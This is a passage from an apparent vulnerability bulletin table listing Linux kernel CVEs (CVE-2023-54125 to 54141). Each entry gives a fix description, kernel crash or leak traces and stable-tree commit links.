kvmalloc_node+0x2d/0x120 [ 139.055301] ? vmemdup_user+0x2b/0xa0 [ 139.058584] __vfs_setxattr+0x121/0x170 [ 139.062617] ? __pfx___vfs_setxattr+0x10/0x10 [ 139.066282] __vfs_setxattr_noperm+0x97/0x300 [ 139.070061] __vfs_setxattr_locked+0x145/0x170 [ 139.073580] vfs_setxattr+0x137/0x2a0 [ 139.076641] ? __pfx_vfs_setxattr+0x10/0x10 [ 139.080223] ? __kasan_check_write+0x18/0x20 [ 139.084234] do_setxattr+0xce/0x150 [ 139.087768] setxattr+0x126/0x140 [ 139.091250] ? __pfx_setxattr+0x10/0x10 [ 139.094948] ? __virt_addr_valid+0xcb/0x140 [ 139.097838] ? __call_rcu_common.constprop.0+0x1c7/0x330 [ 139.102688] ? debug_smp_processor_id+0x1b/0x30 [ 139.105985] ? kasan_quarantine_put+0x5b/0x190 [ 139.109980] ? putname+0x84/0xa0 [ 139.113886] ? __kasan_slab_free+0x11e/0x1b0 [ 139.117961] ? putname+0x84/0xa0 [ 139.121316] ? preempt_count_sub+0x1c/0xd0 [ 139.124427] ? __mnt_want_write+0xae/0x100 [ 139.127836] ? mnt_want_write+0x8f/0x150 [ 139.130954] path_setxattr+0x164/0x180 [ 139.133998] ? __pfx_path_setxattr+0x10/0x10 [ 139.137853] ? __pfx_ksys_pwrite64+0x10/0x10 [ 139.141299] ? debug_smp_processor_id+0x1b/0x30 [ 139.145714] ? fpregs_assert_state_consistent+0x6b/0x80 [ 139.150796] __x64_sys_setxattr+0x71/0x90 [ 139.155407] do_syscall_64+0x3f/0x90 [ 139.159035] entry_SYSCALL_64_after_hwframe+0x72/0xdc [ 139.163843] RIP: 0033:0x7f108cae4469 [ 139.166481] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 088 [ 139.183764] RSP: 002b:00007fff87588388 EFLAGS: 00000286 ORIG_RAX: 00000000000000bc [ 139.190657] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f108cae4469 [ 139.196586] RDX: 00007fff875883b0 RSI: 00007fff875883d1 RDI: 00007fff875883b6 [ 139.201716] RBP: 00007fff8758c530 R08: 0000000000000001 R09: 00007fff8758c618 [ 139.207940] R10: 0000000000000006 R11: 0000000000000286 R12: 00000000004004c0 [ 139.214007] R13: 00007fff8758c610 R14: 0000000000000000 R15 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54125 | https://git.kernel.org/stable/c/1474098b590a426d90f27bb992f17c326e0b60c1 https://git.kernel.org/stable/c/c9db0ff04649aa0b45f497183c957fe260f229f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: safexcel - Cleanup ring IRQ workqueues on load failure A failure loading the safexcel driver results in the following warning on boot, because the IRQ affinity has not been correctly cleaned up. Ensure we clean up the affinity and workqueues on a failure to load the driver. crypto-safexcel: probe of f2800000.crypto failed with error -2 ------------[ cut here ]------------ WARNING: CPU: 1 PID: 232 at kernel/irq/manage.c:1913 free_irq+0x300/0x340 Modules linked in: hwmon mdio_i2c crypto_safexcel(+) md5 sha256_generic libsha256 authenc libdes omap_rng rng_core nft_masq nft_nat nft_chain_nat nf_nat nft_ct nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink fuse autofs4 CPU: 1 PID: 232 Comm: systemd-udevd Tainted: G W 6.1.6-00002-g9d4898824677 #3 Hardware name: MikroTik RB5009 (DT) pstate: 600000c5 (nZCv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : free_irq+0x300/0x340 lr : free_irq+0x2e0/0x340 sp : ffff800008fa3890 x29: ffff800008fa3890 x28: 0000000000000000 x27: 0000000000000000 x26: ffff8000008e6dc0 x25: ffff000009034cac x24: ffff000009034d50 x23: 0000000000000000 x22: 000000000000004a x21: ffff0000093e0d80 x20: ffff000009034c00 x19: ffff00000615fc00 x18: 0000000000000000 x17: 0000000000000000 x16: 0000000000000000 x15: 000075f5c1584c5e x14: 0000000000000017 x13: 0000000000000000 x12: 0000000000000040 x11: ffff000000579b60 x10: ffff000000579b62 x9 : ffff800008bbe370 x8 : ffff000000579dd0 x7 : 0000000000000000 x6 : ffff000000579e18 x5 : ffff000000579da8 x4 : ffff800008ca0000 x3 : ffff800008ca0188 x2 : 0000000013033204 x1 : ffff000009034c00 x0 : ffff8000087eadf0 Call trace: free_irq+0x300/0x340 devm_irq_release+0x14/0x20 devres_release_all+0xa0/0x100 device_unbind_cleanup+0x14/0x60 really_probe+0x198/0x2d4 __driver_probe_device+0x74/0xdc driver_probe_device+0x3c/0x110 __driver_attach+0x8c/0x190 bus_for_each_dev+0x6c/0xc0 driver_attach+0x20/0x30 bus_add_driver+0x148/0x1fc driver_register+0x74/0x120 __platform_driver_register+0x24/0x30 safexcel_init+0x48/0x1000 [crypto_safexcel] do_one_initcall+0x4c/0x1b0 do_init_module+0x44/0x1cc load_module+0x1724/0x1be4 __do_sys_finit_module+0xbc/0x110 __arm64_sys_finit_module+0x1c/0x24 invoke_syscall+0x44/0x110 el0_svc_common.constprop.0+0xc0/0xe0 do_el0_svc+0x20/0x80 el0_svc+0x14/0x4c el0t_64_sync_handler+0xb0/0xb4 el0t_64_sync+0x148/0x14c ---[ end trace 0000000000000000 ]--- | 2025-12-24 | not yet calculated | CVE-2023-54126 | https://git.kernel.org/stable/c/4f4de392f4926820ec1fd3573a016c704a68893d https://git.kernel.org/stable/c/0a89d4a075524cf1f865cfdbb9cf38ab8e3e5409 https://git.kernel.org/stable/c/09e177d6f7edd0873a63f51abe914902ec0f4400 https://git.kernel.org/stable/c/4d9d2fd86766ee3ec077c011aa482e85b6c9595c https://git.kernel.org/stable/c/162f9daf0c22480f88b24fd46d16abae46c10fce https://git.kernel.org/stable/c/ab573af2655ba509e2a167897de9b5585c2ca44d https://git.kernel.org/stable/c/ca25c00ccbc5f942c63897ed23584cfc66e8ec81 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/jfs: prevent double-free in dbUnmount() after failed jfs_remount() Syzkaller reported the following issue: ================================================================== BUG: KASAN: double-free in slab_free mm/slub.c:3787 [inline] BUG: KASAN: double-free in __kmem_cache_free+0x71/0x110 mm/slub.c:3800 Free of addr ffff888086408000 by task syz-executor.4/12750 [...] Call Trace: <TASK> [...] kasan_report_invalid_free+0xac/0xd0 mm/kasan/report.c:482 ____kasan_slab_free+0xfb/0x120 kasan_slab_free include/linux/kasan.h:177 [inline] slab_free_hook mm/slub.c:1781 [inline] slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807 slab_free mm/slub.c:3787 [inline] __kmem_cache_free+0x71/0x110 mm/slub.c:3800 dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264 jfs_umount+0x248/0x3b0 fs/jfs/jfs_umount.c:87 jfs_put_super+0x86/0x190 fs/jfs/super.c:194 generic_shutdown_super+0x130/0x310 fs/super.c:492 kill_block_super+0x79/0xd0 fs/super.c:1386 deactivate_locked_super+0xa7/0xf0 fs/super.c:332 cleanup_mnt+0x494/0x520 fs/namespace.c:1291 task_work_run+0x243/0x300 kernel/task_work.c:179 resume_user_mode_work include/linux/resume_user_mode.h:49 [inline] exit_to_user_mode_loop+0x124/0x150 kernel/entry/common.c:171 exit_to_user_mode_prepare+0xb2/0x140 kernel/entry/common.c:203 __syscall_exit_to_user_mode_work kernel/entry/common.c:285 [inline] syscall_exit_to_user_mode+0x26/0x60 kernel/entry/common.c:296 do_syscall_64+0x49/0xb0 arch/x86/entry/common.c:86 entry_SYSCALL_64_after_hwframe+0x63/0xcd [...] </TASK> Allocated by task 13352: kasan_save_stack mm/kasan/common.c:45 [inline] kasan_set_track+0x3d/0x60 mm/kasan/common.c:52 ____kasan_kmalloc mm/kasan/common.c:371 [inline] __kasan_kmalloc+0x97/0xb0 mm/kasan/common.c:380 kmalloc include/linux/slab.h:580 [inline] dbMount+0x54/0x980 fs/jfs/jfs_dmap.c:164 jfs_mount+0x1dd/0x830 fs/jfs/jfs_mount.c:121 jfs_fill_super+0x590/0xc50 fs/jfs/super.c:556 mount_bdev+0x26c/0x3a0 fs/super.c:1359 legacy_get_tree+0xea/0x180 fs/fs_context.c:610 vfs_get_tree+0x88/0x270 fs/super.c:1489 do_new_mount+0x289/0xad0 fs/namespace.c:3145 do_mount fs/namespace.c:3488 [inline] __do_sys_mount fs/namespace.c:3697 [inline] __se_sys_mount+0x2d3/0x3c0 fs/namespace.c:3674 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Freed by task 13352: kasan_save_stack mm/kasan/common.c:45 [inline] kasan_set_track+0x3d/0x60 mm/kasan/common.c:52 kasan_save_free_info+0x27/0x40 mm/kasan/generic.c:518 ____kasan_slab_free+0xd6/0x120 mm/kasan/common.c:236 kasan_slab_free include/linux/kasan.h:177 [inline] slab_free_hook mm/slub.c:1781 [inline] slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807 slab_free mm/slub.c:3787 [inline] __kmem_cache_free+0x71/0x110 mm/slub.c:3800 dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264 jfs_mount_rw+0x545/0x740 fs/jfs/jfs_mount.c:247 jfs_remount+0x3db/0x710 fs/jfs/super.c:454 reconfigure_super+0x3bc/0x7b0 fs/super.c:935 vfs_fsconfig_locked fs/fsopen.c:254 [inline] __do_sys_fsconfig fs/fsopen.c:439 [inline] __se_sys_fsconfig+0xad5/0x1060 fs/fsopen.c:314 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd [...] JFS_SBI(ipbmap->i_sb)->bmap wasn't set to NULL after kfree() in dbUnmount(). Syzkaller uses faultinject to reproduce this KASAN double-free warning. The issue is triggered if either diMount() or dbMount() fail in jfs_remount(), since diUnmount() or dbUnmount() already happened in such a case - they will do a double-free on the next execution: jfs_umount or jfs_remount. Tested on both upstream and jfs-next by syzkaller. | 2025-12-24 | not yet calculated | CVE-2023-54127 | https://git.kernel.org/stable/c/798c5f6f98bc9045593d4b3a65c32f05d97bd0e6 https://git.kernel.org/stable/c/aef6507e85475e30831c30405d785c7ed976ea4a https://git.kernel.org/stable/c/b12ccbfdf6539ef0157868f69fcae0b7f7a072b3 https://git.kernel.org/stable/c/6f8b34458948ffca2fe90cd8c614e3fa2ebe0b27 https://git.kernel.org/stable/c/aa5b019a3e0f7f54f4e5370c1af827f6b00fd26b https://git.kernel.org/stable/c/2f7a36448f51d08d3a83f1514abcca4b680bcd3c https://git.kernel.org/stable/c/f71c4bb3ec08dfcbd201350a6a0a914c4e6a9e3f https://git.kernel.org/stable/c/cade5397e5461295f3cb87880534b6a07cafa427 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: drop peer group ids under namespace lock When cleaning up peer group ids in the failure path we need to make sure to hold on to the namespace lock. Otherwise another thread might just turn the mount from a shared into a non-shared mount concurrently. | 2025-12-24 | not yet calculated | CVE-2023-54128 | https://git.kernel.org/stable/c/0af8fae81d8b7f1beddc17c5d4cfa43235134648 https://git.kernel.org/stable/c/ddca03d97daa7b07b60c52e3d3060762732c6666 https://git.kernel.org/stable/c/65c324d3f35c05e37afec39ac80743583fdcc96c https://git.kernel.org/stable/c/cb2239c198ad9fbd5aced22cf93e45562da781eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-af: Add validation for lmac type Upon physical link change, firmware reports to the kernel about the change along with the details like speed, lmac_type_id, etc. Kernel derives lmac_type based on lmac_type_id received from firmware. In a few scenarios, firmware returns an invalid lmac_type_id, which results in the kernel panic below. This patch adds the missing validation of the lmac_type_id field. Internal error: Oops: 96000005 [#1] PREEMPT SMP [ 35.321595] Modules linked in: [ 35.328982] CPU: 0 PID: 31 Comm: kworker/0:1 Not tainted 5.4.210-g2e3169d8e1bc-dirty #17 [ 35.337014] Hardware name: Marvell CN103XX board (DT) [ 35.344297] Workqueue: events work_for_cpu_fn [ 35.352730] pstate: 40400089 (nZcv daIf +PAN -UAO) [ 35.360267] pc : strncpy+0x10/0x30 [ 35.366595] lr : cgx_link_change_handler+0x90/0x180 | 2025-12-24 | not yet calculated | CVE-2023-54129 | https://git.kernel.org/stable/c/83a7f27c5b94e43f29f8216a32790751139aa61e https://git.kernel.org/stable/c/afd7660c766c4d317feae004e5cd829390bbc4b0 https://git.kernel.org/stable/c/5c0268b141ad612b6fca13d3a66cfda111716dbb https://git.kernel.org/stable/c/cb5edce271764524b88b1a6866b3e626686d9a33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs/hfsplus: avoid WARN_ON() for sanity check, use proper error handling Commit 55d1cbbbb29e ("hfs/hfsplus: use WARN_ON for sanity check") fixed a build warning by turning a comment into a WARN_ON(), but it turns out that syzbot then complains because it can trigger said warning with a corrupted hfs image. The warning actually does warn about a bad situation, but we are much better off just handling it as the error it is. So rather than warn about us doing bad things, stop doing the bad things and return -EIO. While at it, also fix a memory leak that was introduced by an earlier fix for a similar syzbot warning situation, and add a check for one case that historically wasn't handled at all (ie neither comment nor subsequent WARN_ON). | 2025-12-24 | not yet calculated | CVE-2023-54130 | https://git.kernel.org/stable/c/cc2164ada548addfa8ee215196661c3afe0c5154 https://git.kernel.org/stable/c/82725be426bce0a425cc5e26fbad61ffd29cff03 https://git.kernel.org/stable/c/da23752d9660ba7a8ca6c5768fd8776f67f59ee7 https://git.kernel.org/stable/c/be01f35efa876eb81cebab2cb0add068b7280ef4 https://git.kernel.org/stable/c/f10defb0be6ac42fb6a97b45920d32da6bd6fde8 https://git.kernel.org/stable/c/90e019006644dad35862cb4aa270f561b0732066 https://git.kernel.org/stable/c/45917be9f0af339a45b4619f31c902d37b8aed59 https://git.kernel.org/stable/c/cb7a95af78d29442b8294683eca4897544b8ef46 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rt2x00: Fix memory leak when handling surveys When removing a rt2x00 device, its associated channel surveys are not freed, causing a memory leak observable with kmemleak: unreferenced object 0xffff9620f0881a00 (size 512): comm "systemd-udevd", pid 2290, jiffies 4294906974 (age 33.768s) hex dump (first 32 bytes): 70 44 12 00 00 00 00 00 92 8a 00 00 00 00 00 00 pD.............. 00 00 00 00 00 00 00 00 ab 87 01 00 00 00 00 00 ................ backtrace: [<ffffffffb0ed858b>] __kmalloc+0x4b/0x130 [<ffffffffc1b0f29b>] rt2800_probe_hw+0xc2b/0x1380 [rt2800lib] [<ffffffffc1a9496e>] rt2800usb_probe_hw+0xe/0x60 [rt2800usb] [<ffffffffc1ae491a>] rt2x00lib_probe_dev+0x21a/0x7d0 [rt2x00lib] [<ffffffffc1b3b83e>] rt2x00usb_probe+0x1be/0x980 [rt2x00usb] [<ffffffffc05981e2>] usb_probe_interface+0xe2/0x310 [usbcore] [<ffffffffb13be2d5>] really_probe+0x1a5/0x410 [<ffffffffb13be5c8>] __driver_probe_device+0x78/0x180 [<ffffffffb13be6fe>] driver_probe_device+0x1e/0x90 [<ffffffffb13be972>] __driver_attach+0xd2/0x1c0 [<ffffffffb13bbc57>] bus_for_each_dev+0x77/0xd0 [<ffffffffb13bd2a2>] bus_add_driver+0x112/0x210 [<ffffffffb13bfc6c>] driver_register+0x5c/0x120 [<ffffffffc0596ae8>] usb_register_driver+0x88/0x150 [usbcore] [<ffffffffb0c011c4>] do_one_initcall+0x44/0x220 [<ffffffffb0d6134c>] do_init_module+0x4c/0x220 Fix this by freeing the channel surveys on device removal. Tested with a RT3070 based USB wireless adapter. | 2025-12-24 | not yet calculated | CVE-2023-54131 | https://git.kernel.org/stable/c/eb77c0c0a17c53d83b5fe8e46490fb0a7ed9e6af https://git.kernel.org/stable/c/bea3f8aa999318bdffa2d17753e492f76904f0ce https://git.kernel.org/stable/c/494064ffd60d044c097d514917c40913d1affbca https://git.kernel.org/stable/c/0354bce76ed1d775904acdb4cc0bf88c5b9b5b9f https://git.kernel.org/stable/c/cbef9a83c51dfcb07f77cfa6ac26f53a1ea86f49 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: stop parsing non-compact HEAD index if clusterofs is invalid Syzbot generated a crafted image [1] with a non-compact HEAD index of clusterofs 33024 while valid numbers should be 0 ~ lclustersize-1, which causes the following unexpected behavior as below: BUG: unable to handle page fault for address: fffff52101a3fff9 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 23ffed067 P4D 23ffed067 PUD 0 Oops: 0000 [#1] PREEMPT SMP KASAN CPU: 1 PID: 4398 Comm: kworker/u5:1 Not tainted 6.3.0-rc6-syzkaller-g09a9639e56c0 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/30/2023 Workqueue: erofs_worker z_erofs_decompressqueue_work RIP: 0010:z_erofs_decompress_queue+0xb7e/0x2b40 ... Call Trace: <TASK> z_erofs_decompressqueue_work+0x99/0xe0 process_one_work+0x8f6/0x1170 worker_thread+0xa63/0x1210 kthread+0x270/0x300 ret_from_fork+0x1f/0x30 Note that normal images or images using compact indexes are not impacted. Let's fix this now. [1] https://lore.kernel.org/r/000000000000ec75b005ee97fbaa@google.com | 2025-12-24 | not yet calculated | CVE-2023-54132 | https://git.kernel.org/stable/c/880c79bdb002b9d5b6940e52c2ad3829c2178207 https://git.kernel.org/stable/c/7a4579cd6e4936de107c82499c3c9ee11b63401e https://git.kernel.org/stable/c/060fecf1114ff9fcfe87953fe8c4fc5048777160 https://git.kernel.org/stable/c/7ee7a86e28ce9ead7112286c388df8d254c373c6 https://git.kernel.org/stable/c/f01b2894928affa3339d355608713cf3db8360b8 https://git.kernel.org/stable/c/96a845419b3722869f09883319de4d55c44d9aef https://git.kernel.org/stable/c/cc4efd3dd2ac9f89143e5d881609747ecff04164 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfp: clean mc addresses in application firmware when closing port When moving devices from one namespace to another, mc addresses are cleaned in software while not removed from application firmware. Thus the mc addresses remain and will cause a resource leak. Now use `__dev_mc_unsync` to clean mc addresses when closing port. | 2025-12-24 | not yet calculated | CVE-2023-54133 | https://git.kernel.org/stable/c/c427221733d49fd1e1b79b4a86746acf3ef660e7 https://git.kernel.org/stable/c/cc7eab25b1cf3f9594fe61142d3523ce4d14a788 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: autofs: fix memory leak of waitqueues in autofs_catatonic_mode Syzkaller reports a memory leak: BUG: memory leak unreferenced object 0xffff88810b279e00 (size 96): comm "syz-executor399", pid 3631, jiffies 4294964921 (age 23.870s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 08 9e 27 0b 81 88 ff ff ..........'..... 08 9e 27 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ..'............. backtrace: [<ffffffff814cfc90>] kmalloc_trace+0x20/0x90 mm/slab_common.c:1046 [<ffffffff81bb75ca>] kmalloc include/linux/slab.h:576 [inline] [<ffffffff81bb75ca>] autofs_wait+0x3fa/0x9a0 fs/autofs/waitq.c:378 [<ffffffff81bb88a7>] autofs_do_expire_multi+0xa7/0x3e0 fs/autofs/expire.c:593 [<ffffffff81bb8c33>] autofs_expire_multi+0x53/0x80 fs/autofs/expire.c:619 [<ffffffff81bb6972>] autofs_root_ioctl_unlocked+0x322/0x3b0 fs/autofs/root.c:897 [<ffffffff81bb6a95>] autofs_root_ioctl+0x25/0x30 fs/autofs/root.c:910 [<ffffffff81602a9c>] vfs_ioctl fs/ioctl.c:51 [inline] [<ffffffff81602a9c>] __do_sys_ioctl fs/ioctl.c:870 [inline] [<ffffffff81602a9c>] __se_sys_ioctl fs/ioctl.c:856 [inline] [<ffffffff81602a9c>] __x64_sys_ioctl+0xfc/0x140 fs/ioctl.c:856 [<ffffffff84608225>] do_syscall_x64 arch/x86/entry/common.c:50 [inline] [<ffffffff84608225>] do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80 [<ffffffff84800087>] entry_SYSCALL_64_after_hwframe+0x63/0xcd autofs_wait_queue structs should be freed if their wait_ctr becomes zero. Otherwise they will be lost. In this case an AUTOFS_IOC_EXPIRE_MULTI ioctl is done, then a new waitqueue struct is allocated in autofs_wait(), its initial wait_ctr equals 2. After that wait_event_killable() is interrupted (it returns -ERESTARTSYS), so that the 'wq->name.name == NULL' condition may not be satisfied. Actually, this condition can be satisfied when autofs_wait_release() or autofs_catatonic_mode() is called and, what is also important, wait_ctr is decremented in those places. Upon the exit of autofs_wait(), wait_ctr is decremented to 1. Then the unmounting process begins: kill_sb calls autofs_catatonic_mode(), which should have freed the waitqueues, but it only decrements its usage counter to zero which is not a correct behaviour. edit:imk This description is of course not correct. The umount performed as a result of an expire is a umount of a mount that has been automounted, it's not the autofs mount itself. They happen independently, usually after everything mounted within the autofs file system has been expired away. If everything hasn't been expired away the automount daemon can still exit leaving mounts in place. But expires done in both cases will result in a notification that calls autofs_wait_release() with a result status. The problem case is the summary execution of the automount daemon. In this case any waiting processes won't be woken up until either they are terminated or the mount is umounted. end edit: imk So in catatonic mode we should free waitqueues whose counter becomes zero. edit: imk Initially I was concerned that the calling of autofs_wait_release() and autofs_catatonic_mode() was not mutually exclusive but that can't be the case (obviously) because the queue entry (or entries) is removed from the list when either of these two functions are called. Consequently the wait entry will be freed by only one of these functions or by the woken process in autofs_wait() depending on the order of the calls. end edit: imk | 2025-12-24 | not yet calculated | CVE-2023-54134 | https://git.kernel.org/stable/c/1985e8eae8627f02e3364690c5fed7af1c46be55 https://git.kernel.org/stable/c/976abbdc120a97049b9133e60fa7b29627d11de4 https://git.kernel.org/stable/c/6079dc77c6f32936e8a6766ee8334ae3c99f4504 https://git.kernel.org/stable/c/69ddafc7a7afd8401bab53eff5af813fa0d368a2 https://git.kernel.org/stable/c/71eeddcad7342292c19042c290c477697acaccab https://git.kernel.org/stable/c/726deae613bc1b6096ad3b61cc1e63e33330fbc2 https://git.kernel.org/stable/c/696b625f3f85d80fca48c24d2948fbc451e74366 https://git.kernel.org/stable/c/ccbe77f7e45dfb4420f7f531b650c00c6e9c7507 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: maple_tree: fix potential out-of-bounds access in mas_wr_end_piv() Check the write offset end bounds before using it as the offset into the pivot array. This avoids a possible out-of-bounds access on the pivot array if the write extends to the last slot in the node, in which case the node maximum should be used as the end pivot. akpm: this doesn't affect any current callers, but new users of mapletree may encounter this problem if backported into earlier kernels, so let's fix it in -stable kernels in case of this. | 2025-12-24 | not yet calculated | CVE-2023-54135 | https://git.kernel.org/stable/c/4e2ad53ababeaac44d71162650984abfe783960c https://git.kernel.org/stable/c/dc4751bd4aba01ccfc02f91adfeee0ba4cda405c https://git.kernel.org/stable/c/f5fcf6555a2a4f32947d17b92b173837cc652891 https://git.kernel.org/stable/c/cd00dd2585c4158e81fdfac0bbcc0446afbad26d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: sprd: Fix DMA buffer leak issue Release DMA buffer when _probe() returns failure to avoid memory leak. | 2025-12-24 | not yet calculated | CVE-2023-54136 | https://git.kernel.org/stable/c/c65be6ad55e5e45f8c4e40e1d8d7fe0e21b26e77 https://git.kernel.org/stable/c/9a26aaea6c212ea26bab159933dbfd3321a491f6 https://git.kernel.org/stable/c/f34508d934c4f2efb6a85787fc37f42184dabadf https://git.kernel.org/stable/c/6d209ed70f9c388727995aaece1f930fe63d402b https://git.kernel.org/stable/c/0237f913694d57bcd7e0e7ae6f255b648a1c42a7 https://git.kernel.org/stable/c/4ee715e54e255b1be65722f715fca939d5c2ca7a https://git.kernel.org/stable/c/cd119fdc3ee1450fbf7f78862b5de44c42b6e47f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfio/type1: fix cap_migration information leak Fix an information leak where an uninitialized hole in struct vfio_iommu_type1_info_cap_migration on the stack is exposed to userspace. The definition of struct vfio_iommu_type1_info_cap_migration contains a hole as shown in this pahole(1) output: struct vfio_iommu_type1_info_cap_migration { struct vfio_info_cap_header header; /* 0 8 */ __u32 flags; /* 8 4 */ /* XXX 4 bytes hole, try to pack */ __u64 pgsize_bitmap; /* 16 8 */ __u64 max_dirty_bitmap_size; /* 24 8 */ /* size: 32, cachelines: 1, members: 4 */ /* sum members: 28, holes: 1, sum holes: 4 */ /* last cacheline: 32 bytes */ }; The cap_mig variable is filled in without initializing the hole: static int vfio_iommu_migration_build_caps(struct vfio_iommu *iommu, struct vfio_info_cap *caps) { struct vfio_iommu_type1_info_cap_migration cap_mig; cap_mig.header.id = VFIO_IOMMU_TYPE1_INFO_CAP_MIGRATION; cap_mig.header.version = 1; cap_mig.flags = 0; /* support minimum pgsize */ cap_mig.pgsize_bitmap = (size_t)1 << __ffs(iommu->pgsize_bitmap); cap_mig.max_dirty_bitmap_size = DIRTY_BITMAP_SIZE_MAX; return vfio_info_add_capability(caps, &cap_mig.header, sizeof(cap_mig)); } The structure is then copied to a temporary location on the heap. At this point it's already too late and ioctl(VFIO_IOMMU_GET_INFO) copies it to userspace later: int vfio_info_add_capability(struct vfio_info_cap *caps, struct vfio_info_cap_header *cap, size_t size) { struct vfio_info_cap_header *header; header = vfio_info_cap_add(caps, size, cap->id, cap->version); if (IS_ERR(header)) return PTR_ERR(header); memcpy(header + 1, cap + 1, size - sizeof(*header)); return 0; } This issue was found by code inspection. | 2025-12-24 | not yet calculated | CVE-2023-54137 | https://git.kernel.org/stable/c/ad83d83dd891244de0d07678b257dc976db7c132 https://git.kernel.org/stable/c/13fd667db999bffb557c5de7adb3c14f1713dd51 https://git.kernel.org/stable/c/f6f300ecc196d243c02adeb9ee0c62c677c24bfb https://git.kernel.org/stable/c/cbac29a1caa49a34e131394e1f4d924a76d8b0c9 https://git.kernel.org/stable/c/1b5feb8497cdb5b9962db2700814bffbc030fb4a https://git.kernel.org/stable/c/cd24e2a60af633f157d7e59c0a6dba64f131c0b1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: fix NULL-deref on irq uninstall In case of early initialisation errors and on platforms that do not use the DPU controller, the deinitialisation code can be called with the kms pointer set to NULL. Patchwork: https://patchwork.freedesktop.org/patch/525104/ | 2025-12-24 | not yet calculated | CVE-2023-54138 | https://git.kernel.org/stable/c/e2d1cc82ad509c07a9ab0ab4bf88b6613fbf784b https://git.kernel.org/stable/c/dd8ce825b165acf997689c5ffa45d6a7a1fc0260 https://git.kernel.org/stable/c/bafa985acff9b0ed53957beff33c18be08d6b9a6 https://git.kernel.org/stable/c/72092e34742e8b34accdadfa7bd9a13cf255a531 https://git.kernel.org/stable/c/cd459c005de3e2b855a8cc7768e633ce9d018e9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing/user_events: Ensure write index cannot be negative The write index indicates which event the data is for and accesses a per-file array. The index is passed by user processes during write() calls as the first 4 bytes. Ensure that it cannot be negative by returning -EINVAL to prevent out of bounds accesses. Update ftrace self-test to ensure this occurs properly. | 2025-12-24 | not yet calculated | CVE-2023-54139 | https://git.kernel.org/stable/c/0489c2b2c3104b89f078dbcec8c744dfc157d3e9 https://git.kernel.org/stable/c/4fe46b5adf18e3dc606e62c9e6a0413398a17572 https://git.kernel.org/stable/c/fa7f2f5d1739452280c22727c4384a52b72ab5de https://git.kernel.org/stable/c/cd98c93286a30cc4588dfd02453bec63c2f4acf4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix WARNING in mark_buffer_dirty due to discarded buffer reuse A syzbot stress test using a corrupted disk image reported that mark_buffer_dirty() called from __nilfs_mark_inode_dirty() or nilfs_palloc_commit_alloc_entry() may output a kernel warning, and can panic if the kernel is booted with panic_on_warn. This is because nilfs2 keeps buffer pointers in local structures for some metadata and reuses them, but such buffers may be forcibly discarded by nilfs_clear_dirty_page() in some critical situations. This issue is reported to appear after commit 28a65b49eb53 ("nilfs2: do not write dirty data after degenerating to read-only"), but the issue has potentially existed before. Fix this issue by checking the uptodate flag when attempting to reuse an internally held buffer, and reloading the metadata instead of reusing the buffer if the flag was lost. | 2025-12-24 | not yet calculated | CVE-2023-54140 | https://git.kernel.org/stable/c/473795610594f261e98920f0945550314df36f07 https://git.kernel.org/stable/c/d95e403588738c7ec38f52b9f490b15e7745d393 https://git.kernel.org/stable/c/99a73016a5e12a09586a96f998e91f9ea145cd00 https://git.kernel.org/stable/c/f1d637b63d8a27ac3386f186a694907f2717fc13 https://git.kernel.org/stable/c/b911bef132a06de01a745c6a24172d6db7216333 https://git.kernel.org/stable/c/4da07e958bfda2d69d83db105780e8916e3ac02e https://git.kernel.org/stable/c/46c11be2dca295742a5508ea910a77f7733fb7f4 https://git.kernel.org/stable/c/b308b3eabc429649b5501d36290cea403fbd746c https://git.kernel.org/stable/c/cdaac8e7e5a059f9b5e816cda257f08d0abffacd |
